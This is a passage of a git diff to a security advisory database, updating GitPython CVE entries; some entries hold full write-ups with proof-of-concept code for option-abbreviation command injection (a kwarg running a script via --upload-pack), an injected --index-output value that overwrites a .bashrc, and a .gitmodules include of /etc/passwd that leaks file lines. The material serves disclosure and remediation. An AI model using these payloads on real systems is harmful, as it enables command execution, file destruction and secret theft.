(`allow_unsafe_protocols=False`). The directly weaponizable family is `upload-pack` / `receive-pack` / `exec`. Reported transparently — not claiming Critical.\n\n### Suggested remediation (any one)\n\n1. **Prefix-aware matching:** reject any option whose canonical name is an unambiguous prefix of a blocked option (≈ `startswith` on the blocked canonical name, after `dashify`).\n2. **Disable abbreviation at the sink:** pass `--end-of-options` or invoke git in a way that disables long-option abbreviation.\n3. **Allowlist** option names on security-sensitive subcommands instead of a blocklist.\n\nRemediation should also cover the `-c`/`--config` family abbreviations, even though the `ext::` route is currently gated by the protocol allowlist.", + "details": "## Command injection via long-option prefix abbreviation bypassing `check_unsafe_options` (incomplete fix of CVE-2026-42215 / GHSA-rpm5-65cw-6hj4)\n\n**Component:** gitpython-developers/GitPython (PyPI: GitPython)\n**Affected:** all versions carrying the 3.1.47 blocklist fix, through current `main` (verified at commit `20c5e275`, `3.1.50-42`)\n**Reporter:** hackkim\n\n### Summary\n\nThe 3.1.47 fix for CVE-2026-42215 blocks dangerous git options (`--upload-pack`, `--config`, `-c`, `-u` for clone; `--upload-pack` for fetch/pull; `--receive-pack`, `--exec` for push) so callers cannot reach command-executing options unless they pass `allow_unsafe_options=True`.\n\nThe fix canonicalizes an option name along **one** axis (underscore→hyphen via `dashify`) and checks it against an **exact-match** dict. It does not account for git's unambiguous long-option prefix abbreviation. Git accepts any unambiguous prefix of a long option (`--upload-p`, `--upload-pa`, `--upload-pac` all resolve to `--upload-pack`). So a kwarg key like `upload_p` canonicalizes to `upload-p`, misses the blocklist dict, and is emitted to git as `--upload-p=` → executed as `--upload-pack=` → command injection, in the default `allow_unsafe_options=False` configuration.\n\n### The asymmetry (root cause)\n\n```python\n# git/cmd.py (commit 20c5e275), lines 948-974\n@classmethod\ndef _canonicalize_option_name(cls, option):\n option_name = option.lstrip(\"-\").split(\"=\", 1)[0]\n option_tokens = option_name.split(None, 1)\n if not option_tokens:\n return \"\"\n return dashify(option_tokens[0]) # only transform: \"_\" -> \"-\"\n\n@classmethod\ndef check_unsafe_options(cls, options, unsafe_options):\n canonical_unsafe_options = {cls._canonicalize_option_name(o): o for o in unsafe_options}\n for option in options:\n unsafe_option = canonical_unsafe_options.get(cls._canonicalize_option_name(option))\n if unsafe_option is not None:\n raise UnsafeOptionError(...)\n```\n\nThe guard normalizes only `_`→`-` and does exact dict membership. Git's CLI parser accepts a broader grammar (prefix abbreviation) than the guard models, so abbreviated keys slip through and reach git as the blocked option.\n\n### Affected code (commit `20c5e275`)\n\n| Location | Role |\n|---|---|\n| `git/cmd.py:948-960` `_canonicalize_option_name` | canonicalizer — no prefix expansion |\n| `git/cmd.py:963-974` `check_unsafe_options` | exact-match dict lookup (the incomplete guard) |\n| `git/cmd.py:1511` `transform_kwarg` | emits `--=` to the CLI |\n| `git/repo/base.py:1411,1413` | clone call sites |\n| `git/remote.py:1074,1128,1201` | fetch / pull / push call sites |\n\n### Bypass keys (verified)\n\n| kwarg key | git resolves to | path | weaponizable |\n|---|---|---|---|\n| `upload_p`, `upload_pac` | `--upload-pack` | clone / fetch / pull | Yes — direct RCE |\n| `receive_p` | `--receive-pack` | push | Yes — direct RCE |\n| `exe` | `--exec` | push | Yes — direct RCE |\n| `conf`, `confi` | `--config` | clone | bypasses option blocklist; RCE needs an additional config vector (see note) |\n\n### Minimal PoC\n\nSelf-contained, no network egress (a local bare repo acts as the \"remote\"). Tested on current `main` (git 2.50.1):\n\n```python\nimport os, stat, tempfile\nfrom git import Repo\n\nwork = tempfile.mkdtemp()\nmarker = os.path.join(work, \"RCE_MARKER\")\n\n# fake \"upload-pack\" program that proves arbitrary command execution\nprog = os.path.join(work, \"evil.sh\")\nwith open(prog, \"w\") as f:\n f.write(f\"#!/bin/sh\\ntouch {marker}\\nexit 1\\n\") # exit 1 so git aborts after our code ran\nos.chmod(prog, os.stat(prog).st_mode | stat.S_IEXEC)\n\nbare = os.path.join(work, \"remote.git\")\nRepo.init(bare, bare=True)\n\n# attacker-controlled kwarg KEY 'upload_p' -> --upload-p= -> git runs \ntry:\n Repo.clone_from(bare, os.path.join(work, \"out\"), upload_p=prog)\nexcept Exception:\n pass # git aborts with GitCommandError AFTER the payload executed\n\nprint(\"RCE marker created:\", os.path.exists(marker)) # True -> command injection confirmed\n```\n\nEquivalent at the shell: `git clone --upload-p=/tmp/evil.sh src out` runs `evil.sh`.\n\nConfirmed behavior:\n- `upload_pack` (exact) → blocked; `upload_p` (abbrev) → passes guard, reaches git, executes. The fix works for the form it models but not the abbreviated form.\n- `allow_unsafe_options=True` opt-out behaves as documented (out of scope).\n\n### Honest scope note\n\nLike the parent CVE, exploitation requires a host application that flows attacker-controlled kwarg **keys** into a GitPython clone/fetch/pull/push. Where the host passes only fixed/validated keys, this is not reachable — the vulnerability is in the library's documented defense-in-depth control (`allow_unsafe_options=False`), which this variant defeats.\n\nOn the `--config` family: `conf` bypasses the option blocklist, but weaponizing `--config protocol.ext.allow=always` via an `ext::` URL is independently blocked by GitPython's protocol allowlist (`allow_unsafe_protocols=False`). The directly weaponizable family is `upload-pack` / `receive-pack` / `exec`. Reported transparently — not claiming Critical.\n\n### Suggested remediation (any one)\n\n1. **Prefix-aware matching:** reject any option whose canonical name is an unambiguous prefix of a blocked option (≈ `startswith` on the blocked canonical name, after `dashify`).\n2. **Disable abbreviation at the sink:** pass `--end-of-options` or invoke git in a way that disables long-option abbreviation.\n3. **Allowlist** option names on security-sensitive subcommands instead of a blocklist.\n\nRemediation should also cover the `-c`/`--config` family abbreviations, even though the `ext::` route is currently gated by the protocol allowlist.", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2f96-g7mh-g2hx" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67325" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2161" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.51" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-injection-via-option-prefix-abbreviation" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-73619.json b/advisories/BREW-tartufo-CVE-2026-73619.json index 6435a4e023..e8f91ee8af 100644 --- a/advisories/BREW-tartufo-CVE-2026-73619.json +++ b/advisories/BREW-tartufo-CVE-2026-73619.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-73619", "published": "2026-08-14T09:45:06Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-539m-9xh6-q6rr", - "CVE-2026-73619" + "CVE-2026-73619", + "PYSEC-2026-3948" ], "affected": [ { diff --git a/advisories/BREW-tartufo-CVE-2026-73620.json b/advisories/BREW-tartufo-CVE-2026-73620.json index 182d07fbef..9b285efb6b 100644 --- a/advisories/BREW-tartufo-CVE-2026-73620.json +++ b/advisories/BREW-tartufo-CVE-2026-73620.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-73620", "published": "2026-08-14T09:45:06Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:07:24Z", "upstream": [ "GHSA-3f7w-8rr8-f37f", - "CVE-2026-73620" + "CVE-2026-73620", + "PYSEC-2026-3949" ], "affected": [ { diff --git a/advisories/BREW-tartufo-CVE-2026-73621.json b/advisories/BREW-tartufo-CVE-2026-73621.json index c9d2f239e8..767069f3ed 100644 --- a/advisories/BREW-tartufo-CVE-2026-73621.json +++ b/advisories/BREW-tartufo-CVE-2026-73621.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-73621", "published": "2026-08-14T09:45:06Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-p538-c434-8v24", - "CVE-2026-73621" + "CVE-2026-73621", + "PYSEC-2026-3950" ], "affected": [ { diff --git a/advisories/BREW-tartufo-CVE-2026-73622.json b/advisories/BREW-tartufo-CVE-2026-73622.json index a0c474cfa6..23a456b1cb 100644 --- a/advisories/BREW-tartufo-CVE-2026-73622.json +++ b/advisories/BREW-tartufo-CVE-2026-73622.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-73622", "published": "2026-08-14T09:45:06Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-94p4-4cq8-9g67", - "CVE-2026-73622" + "CVE-2026-73622", + "PYSEC-2026-3951" ], "affected": [ { diff --git a/advisories/BREW-tartufo-CVE-2026-73623.json b/advisories/BREW-tartufo-CVE-2026-73623.json index bc4c14452f..6dc8e769d8 100644 --- a/advisories/BREW-tartufo-CVE-2026-73623.json +++ b/advisories/BREW-tartufo-CVE-2026-73623.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-73623", "published": "2026-08-14T09:45:06Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-6p8h-3wgx-97gf", - "CVE-2026-73623" + "CVE-2026-73623", + "PYSEC-2026-3952" ], "affected": [ { diff --git a/advisories/BREW-tartufo-CVE-2026-73625.json b/advisories/BREW-tartufo-CVE-2026-73625.json index 9a841de195..8b4018c6f6 100644 --- a/advisories/BREW-tartufo-CVE-2026-73625.json +++ b/advisories/BREW-tartufo-CVE-2026-73625.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-73625", "published": "2026-08-14T09:45:06Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-r9mr-m37c-5fr3", - "CVE-2026-73625" + "CVE-2026-73625", + "PYSEC-2026-3953" ], "affected": [ { diff --git a/advisories/BREW-tartufo-CVE-2026-76217.json b/advisories/BREW-tartufo-CVE-2026-76217.json index 8f3fc6d89d..ff4be931bb 100644 --- a/advisories/BREW-tartufo-CVE-2026-76217.json +++ b/advisories/BREW-tartufo-CVE-2026-76217.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-76217", "published": "2026-08-20T09:45:22Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-hh9p-6wh2-4mfc", - "CVE-2026-76217" + "CVE-2026-76217", + "PYSEC-2026-3841" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-hh9p-6wh2-4mfc" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76217" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-pathspec-from-file" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-76218.json b/advisories/BREW-tartufo-CVE-2026-76218.json index d1260df875..9ae62fbf55 100644 --- a/advisories/BREW-tartufo-CVE-2026-76218.json +++ b/advisories/BREW-tartufo-CVE-2026-76218.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-76218", "published": "2026-08-20T09:45:22Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-9rj7-rf2p-w77r", - "CVE-2026-76218" + "CVE-2026-76218", + "PYSEC-2026-3840" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-9rj7-rf2p-w77r" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76218" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-repo-init" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-76219.json b/advisories/BREW-tartufo-CVE-2026-76219.json index 5e0812ff47..cf20bab704 100644 --- a/advisories/BREW-tartufo-CVE-2026-76219.json +++ b/advisories/BREW-tartufo-CVE-2026-76219.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-76219", "published": "2026-08-20T09:45:22Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-4gmw-gg2m-w46p", - "CVE-2026-76219" + "CVE-2026-76219", + "PYSEC-2026-3838" ], "affected": [ { @@ -52,7 +53,7 @@ ] }, "summary": "GitPython: Unguarded git read-tree option forwarding in IndexFile.from_tree/reset/merge_tree enables arbitrary file overwrite", - "details": "## Summary\n`IndexFile.from_tree`, `IndexFile.reset` (→ from_tree) and `IndexFile.merge_tree` append caller-influenced treeish strings positionally to `git read-tree` with no unsafe-option guard, no `allow_unsafe_options` parameter, and no `--` separator. `git read-tree --index-output=` writes the resulting index to an arbitrary path, and last-occurrence-wins lets an injected `--index-output` override the method's internal temp path — clobbering an arbitrary file with a valid git-index blob. This is a distinct, never-guarded sink: commit `3af0c251` (GHSA-3f7w-8rr8-f37f) guarded only `checkout_index` and `tag`; `read_tree` was left unprotected (it is among the acknowledged unguarded call sites in that advisory's sweep but was never reported or fixed).\n\n## Root Cause\n`from_tree` (index/base.py:388), `reset` (delegates to from_tree), and `merge_tree` (index/base.py:291) call `repo.git.read_tree(*arg_list)` with no `check_unsafe_options` and no `--`. The treeish is caller-influenced and positional.\n\n## Impact\nArbitrary file overwrite / destruction at the privileges of the host process. Content is constrained to a git-index blob (not attacker-chosen, so not RCE), but the target path is fully attacker-controlled — corrupting/truncating configs or destroying files at attacker-chosen writable locations = I:H + A:H (per the skill's \"overwrite-any-path = I:H\" rule). Pure VALUE control (positional treeish). Default configuration.\n\n## Proof of Concept\n```python\nIndexFile.from_tree(repo, \"--index-output=/home/victim/.bashrc\")\n# target overwritten with a valid git-index blob (DIRC...)\n```\n\n## Attack Chain\n1. Entry: app calls `IndexFile.from_tree(repo, treeish)` / `reset(commit=…)` / `merge_tree(base=…, rhs=…)` with attacker `treeish=\"--index-output=/home/victim/.bashrc\"`.\n2. Check: NONE — the methods have no `allow_unsafe_options` and never call `check_unsafe_options`.\n3. Sink: `repo.git.read_tree(*arg_list)` — no `--`. argv (from_tree, observed): `['git','read-tree','--index-output=','--index-output=/…/victim']` (last-wins).\n4. Impact: target path created/overwritten with a valid git-index blob; existing content destroyed.\n\n## Bypass Evidence\nIndependently reproduced (gate harness): `IndexFile.from_tree(repo,'--index-output=')` → victim overwritten; before=`IMPORTANT ORIGINAL CONTENT`, after starts `DIRC\\x00\\x00\\x00\\x02…` (destructive clobber, valid index blob). `reset(commit=…)` and both `merge_tree` positionals verified. Fix-commit read: `3af0c251` touched only `checkout_index`+`tag`; `read_tree` untouched on HEAD.\n\n## Affected Versions\n`GitPython <= 3.1.57` (sinks present verbatim on the latest release tag).\n\n## Suggested Fix\nAdd a `check_unsafe_options` guard (with an `allow_unsafe_options` parameter) to `from_tree`/`reset`/`merge_tree`, and/or place a `--` separator before the positional treeish arguments; block `--index-output` (a path-taking option) on this sink.\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", + "details": "## Summary\n`IndexFile.from_tree`, `IndexFile.reset` (→ from_tree) and `IndexFile.merge_tree` append caller-influenced treeish strings positionally to `git read-tree` with no unsafe-option guard, no `allow_unsafe_options` parameter, and no `--` separator. `git read-tree --index-output=` writes the resulting index to an arbitrary path, and last-occurrence-wins lets an injected `--index-output` override the method's internal temp path — clobbering an arbitrary file with a valid git-index blob. This is a distinct, never-guarded sink: commit `3af0c251` (GHSA-3f7w-8rr8-f37f) guarded only `checkout_index` and `tag`; `read_tree` was left unprotected (it is among the acknowledged unguarded call sites in that advisory's sweep but was never reported or fixed).\n\n## Root Cause\n`from_tree` (index/base.py:388), `reset` (delegates to from_tree), and `merge_tree` (index/base.py:291) call `repo.git.read_tree(*arg_list)` with no `check_unsafe_options` and no `--`. The treeish is caller-influenced and positional.\n\n## Impact\nArbitrary file overwrite / destruction at the privileges of the host process. Content is constrained to a git-index blob (not attacker-chosen, so not RCE), but the target path is fully attacker-controlled — corrupting/truncating configs or destroying files at attacker-chosen writable locations = I:H + A:H (per the skill's \"overwrite-any-path = I:H\" rule). Pure VALUE control (positional treeish). Default configuration.\n\n## Proof of Concept\n```python\nIndexFile.from_tree(repo, \"--index-output=/home/victim/.bashrc\")\n# target overwritten with a valid git-index blob (DIRC...)\n```\n\n## Attack Chain\n1. Entry: app calls `IndexFile.from_tree(repo, treeish)` / `reset(commit=…)` / `merge_tree(base=…, rhs=…)` with attacker `treeish=\"--index-output=/home/victim/.bashrc\"`.\n2. Check: NONE — the methods have no `allow_unsafe_options` and never call `check_unsafe_options`.\n3. Sink: `repo.git.read_tree(*arg_list)` — no `--`. argv (from_tree, observed): `['git','read-tree','--index-output=','--index-output=/…/victim']` (last-wins).\n4. Impact: target path created/overwritten with a valid git-index blob; existing content destroyed.\n\n## Bypass Evidence\nIndependently reproduced (gate harness): `IndexFile.from_tree(repo,'--index-output=')` → victim overwritten; before=`IMPORTANT ORIGINAL CONTENT`, after starts `DIRC\\x00\\x00\\x00\\x02…` (destructive clobber, valid index blob). `reset(commit=…)` and both `merge_tree` positionals verified. Fix-commit read: `3af0c251` touched only `checkout_index`+`tag`; `read_tree` untouched on HEAD.\n\n## Affected Versions\n`GitPython <= 3.1.57` (sinks present verbatim on the latest release tag).\n\n## Suggested Fix\nAdd a `check_unsafe_options` guard (with an `allow_unsafe_options` parameter) to `from_tree`/`reset`/`merge_tree`, and/or place a `--` separator before the positional treeish arguments; block `--index-output` (a path-taking option) on this sink.", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-4gmw-gg2m-w46p" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76219" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-overwrite-via-read-tree" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-76220.json b/advisories/BREW-tartufo-CVE-2026-76220.json index 399c29bd07..2cedc7937c 100644 --- a/advisories/BREW-tartufo-CVE-2026-76220.json +++ b/advisories/BREW-tartufo-CVE-2026-76220.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-76220", "published": "2026-08-20T09:45:22Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-wvpp-8hx9-p66j", - "CVE-2026-76220" + "CVE-2026-76220", + "PYSEC-2026-3843" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-wvpp-8hx9-p66j" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76220" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-execution-via-split-single-char-options" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-76221.json b/advisories/BREW-tartufo-CVE-2026-76221.json index 79d7288309..8c3d60afa6 100644 --- a/advisories/BREW-tartufo-CVE-2026-76221.json +++ b/advisories/BREW-tartufo-CVE-2026-76221.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-76221", "published": "2026-08-20T09:45:22Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-jm78-9fvv-mhgr", "CVE-2026-76221", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2026-76222.json b/advisories/BREW-tartufo-CVE-2026-76222.json index a9cb65be4a..98303ffae9 100644 --- a/advisories/BREW-tartufo-CVE-2026-76222.json +++ b/advisories/BREW-tartufo-CVE-2026-76222.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-76222", "published": "2026-08-20T09:45:22Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-hmq2-w58f-27jc", "CVE-2026-76222", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", @@ -73,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-hmq2-w58f-27jc" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76222" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2202" @@ -92,6 +88,14 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3784.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-gitmodules-submodule-name" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-78675.json b/advisories/BREW-tartufo-CVE-2026-78675.json index 777836c4c5..3d793c9741 100644 --- a/advisories/BREW-tartufo-CVE-2026-78675.json +++ b/advisories/BREW-tartufo-CVE-2026-78675.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-78675", "published": "2026-09-04T10:12:20Z", - "modified": "2026-09-05T10:16:40Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "PYSEC-2026-3785", "CVE-2026-78675", @@ -52,21 +52,50 @@ } ] }, - "details": "GitPython before 3.1.59 fails to disable merge_includes when parsing .gitmodules, allowing attackers to disclose local file content by including arbitrary file paths via [include] directives. Attackers can craft a malicious .gitmodules file with include directives pointing to sensitive files; when repo.submodules is accessed, GitConfigParser raises MissingSectionHeaderError embedding the target file's first line verbatim in the exception message.", + "summary": "GitPython: Arbitrary local file content disclosure via [include] directive in untrusted .gitmodules (SubmoduleConfigParser never disables merge_includes)", + "details": "# [HIGH] Arbitrary local file content disclosure via `[include]` directive in untrusted `.gitmodules` (`SubmoduleConfigParser` never disables `merge_includes`)\n\n- **CWE:** CWE-200 (Exposure of Sensitive Information) / CWE-73 (External Control of File Name or Path)\n- **Affected component:** `git/objects/submodule/base.py`, `Submodule._config_parser()` (~line 273) constructing `SubmoduleConfigParser(fp_module, read_only=read_only)`; `git/config.py`, `GitConfigParser.__init__` (`merge_includes` default), `GitConfigParser.read()`/`_included_paths()` (include-path resolution, ~lines 630-685), `GitConfigParser._read()` (~line 493-498, `MissingSectionHeaderError`)\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\n`GitConfigParser.__init__` defaults `merge_includes=True`: any config file it parses has its `[include]` (and, when a `repo=` is supplied, `[includeIf ...]`) directives followed and merged in. The maintainers already recognized this as dangerous for one specific case and fixed it in commit `41ecc6a4` (\"Disable merge_includes in config writers\"), which passes `merge_includes=False` when `Repo.config_writer()` builds its parser (`git/repo/base.py`).\n\nThat fix never touched `Submodule._config_parser()`. This method builds the parser used for **every** read of a repo's submodule configuration — `repo.submodules`, `Submodule.iter_items()`, `Submodule.config()` — via `SubmoduleConfigParser(fp_module, read_only=read_only)`, passing neither `merge_includes=False` nor `repo=`. The `True` class default is therefore inherited unchanged, and `fp_module` here is `.gitmodules` — **the single most attacker-controlled config file in the entire codebase**, since it ships verbatim as tracked content inside any cloned repository.\n\n`GitConfigParser.read()`'s include-path resolution (~line 662-680) performs no containment check: `osp.isabs(include_path)` short-circuits the path join entirely for an absolute path, and a relative path is joined with `osp.join(osp.dirname(file_path), include_path)` / `osp.normpath()`'d with no check that the result stays under the repository. `~` is expanded via `osp.expanduser`. The only gate before opening is `os.access(include_path, os.R_OK)` — a readability check, not a path restriction.\n\nOnce opened, `GitConfigParser._read()` parses the target file as git-config INI. If the first non-blank/non-comment line is not a `[section]` header — true of virtually any non-gitconfig file (source code, `/etc/passwd`, `.env` files, credential files, logs, JSON/YAML) — it raises `configparser.MissingSectionHeaderError(fpname, lineno, line)`. Python's stdlib formats this exception's `str()` as `\"File contains no section headers.\\nfile: %r, line: %d\\n%r\" % (fpname, lineno, line)` — it embeds the **verbatim content** of that file's first line in the exception message. `Submodule.iter_items()` catches only `(IOError, BadName)`, not `configparser.Error`, so this exception propagates straight out of the ordinary, read-only `repo.submodules` call.\n\n## Root cause\nParity gap between two config-parser construction sites for the exact same footgun: `Repo.config_writer()` was hardened against `merge_includes` in 2023 (`41ecc6a4`); `Submodule._config_parser()` — which parses `.gitmodules`, content that is *always* attacker-controlled the moment a repository is cloned from an untrusted source — was never given the same treatment. (The submodule *write*-mode config parser at `git/objects/submodule/base.py` for `.git/modules//config` — a different, locally-generated file — has correctly passed `merge_includes=False` since 2022, underscoring that the omission for `.gitmodules` reads looks like an oversight rather than a considered exception.)\n\n## Exploit path\n1. Attacker crafts a repository whose `.gitmodules` contains a legitimate-looking `[submodule ...]` section plus:\n ```\n [include]\n \tpath = /etc/passwd\n ```\n (an absolute path bypasses any traversal reasoning entirely; a relative `../../../../etc/passwd`-style path works too).\n2. Victim performs the extremely common, entirely read-only operation of enumerating a cloned repo's submodules: `list(repo.submodules)` (or any `for sm in repo.submodules`) — no `update()`, `init()`, or checkout of any kind required.\n3. `SubmoduleConfigParser` (inheriting `merge_includes=True`) follows the `[include]` directive, opens `/etc/passwd`, and `GitConfigParser._read()` raises `MissingSectionHeaderError` whose message embeds `/etc/passwd`'s first line verbatim.\n4. This exception surfaces wherever the host application observes exceptions from GitPython — CI logs, error pages, exception trackers, or any dependency-scanner/code-review-bot/hosting-platform tool built on `repo.submodules` — disclosing the targeted file's first line to the attacker (directly, or indirectly via any channel that echoes the error).\n\n## Impact\nNon-blind local file content disclosure (first line) of any file readable by the victim process, triggered purely by attacker-controlled repository content and one routine, read-only GitPython call. Bounded to one line per triggering file (parsing aborts at the first `MissingSectionHeaderError`), but that line very often *is* the secret — `.env` files (`DATABASE_URL=...`, `API_KEY=...`), single-line credential/token files, `/etc/passwd`'s root entry for host fingerprinting. The primitive additionally serves as a generic error-based file-existence oracle for arbitrary host paths. This is materially stronger than the already-fixed, explicitly **blind** `GHSA-cwvm-v4w8-q58c` (\"Blind local file inclusion\", CVSS 4.0, `git/refs/symbolic.py` ref-name resolution) — that advisory's own writeup states it cannot disclose content; this one does, verbatim, via a different module (`git/config.py`'s include resolution).\n\n## Preconditions\n- Victim clones (or otherwise opens with GitPython) a repository whose `.gitmodules` is attacker-controlled — the default trust model for any tool that processes third-party repositories (dependency scanners, CI, code hosting/review bots, \"audit this repo\" utilities — exactly the class of application GitPython itself is built for).\n- Victim performs any operation that touches `repo.submodules` — one of the most ordinary GitPython operations, requiring no submodule `update`/`init`/checkout.\n- No authentication/role requirement inside GitPython itself.\n\n## Evidence\n- `git/config.py` — `GitConfigParser.__init__` defaults `merge_includes=True`.\n- `git/objects/submodule/base.py:273` — `SubmoduleConfigParser(fp_module, read_only=read_only)` passes neither `merge_includes` nor `repo=`; `git blame` shows this call unchanged since the class was introduced, and `git show 41ecc6a4` confirms that commit touched only `git/repo/base.py`'s `Repo.config_writer()`, never this call site.\n- `git/config.py` `_included_paths()`/`read()` (~630-685) — absolute include paths bypass the join/normpath entirely (`osp.isabs()` short-circuit); no repository-boundary containment check exists anywhere in this path.\n- `git/config.py` `_read()` (~493-498) — raises `cp.MissingSectionHeaderError(fpname, lineno, line)` with the raw file line embedded, matching Python stdlib `configparser`'s own `__str__` behavior.\n- `Submodule.iter_items()` catches only `(IOError, BadName)` — `configparser.Error` (the base of `MissingSectionHeaderError`) is not swallowed.\n- PoC (`gitpython-003-poc.py`, embedded below) reproduces this end-to-end against this exact checkout via the public API only (`Repo.clone_from` + `list(repo.submodules)`, default arguments, no monkeypatching), against both a throwaway secret file and `/etc/passwd`.\n\n## False-positive check (adversarial re-read)\n- **Is this the same bug as `GHSA-hmq2-w58f-27jc`?** No — that advisory is about the `.gitmodules` submodule *name* driving `_module_abspath`/`os.makedirs()` (creating a git repository/module directory outside the working tree, a write/RCE-adjacent primitive via a completely different function). This finding is about the `[include]` directive in the *same file* reaching a config-parser read primitive — a different mechanism, different function, 